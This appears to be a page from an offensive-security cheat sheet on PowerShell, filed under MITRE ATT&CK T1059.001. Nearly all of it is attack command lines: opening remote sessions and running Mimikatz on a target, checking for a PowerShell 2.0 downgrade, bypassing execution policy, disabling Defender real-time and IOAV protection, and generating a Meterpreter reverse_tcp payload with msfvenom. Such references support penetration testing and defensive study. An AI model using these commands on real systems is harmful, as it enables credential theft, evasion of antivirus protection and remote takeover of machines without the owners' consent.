PowerShell

MITRE ATT&CK, Execution, Technique T1059.001

Basic Usage

Creating a PowerShell Session

Background: We can establish a persistent connection in PowerShell using Enter-PSSession. This can make life significantly easier and reduce overhead.

New-PSSession -ComputerName [IP] -Credential [USER]
Enter-PSSession -Session $#

Executing Scripts Remotely

Background: We can execute scripts remotely with PowerShell.

Invoke-Command -Session $# -FilePath C:\Users\Parzival\Desktop\Mimikatz.exe

Enumeration

Enumerate Installed Versions

Background: This can be helpful when determining if a PowerShell downgrade attack will work.

(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\PowerShell\*\PowerShellEngin e -Name PowerShellVersion).PowerShellVersion

This is important as if PowerShell 2.0 is installed then we can bypass multiple security protections enabled in more recent PowerShell Version 5 releases:

powershell.exe -Version 2

Offensive PowerShell

Bypassing Execution Policy

Information: Execution policies can be disabled in multiple ways. It is not a sufficient security protection to prevent unsigned scripts from being loaded.

powershell.exe -exec bypass 
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process

Bypassing Real-time Monitoring

Powershell Set-MpPreference -DisableRealtimeMonitoring $true
Powershell Set-MpPreference -DisableIOAVProtection $true

Meterpreter Shell

msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=$ip LPORT=$port

PreviousLateral Movement NextWindows Remote Management (WinRM)

Last updated 3 years ago

hashtagBasic Usage

hashtagCreating a PowerShell Session

hashtagExecuting Scripts Remotely

hashtagEnumeration

hashtagEnumerate Installed Versions

hashtagOffensive PowerShell

hashtagBypassing Execution Policy

hashtagBypassing Real-time Monitoring

hashtagMeterpreter Shell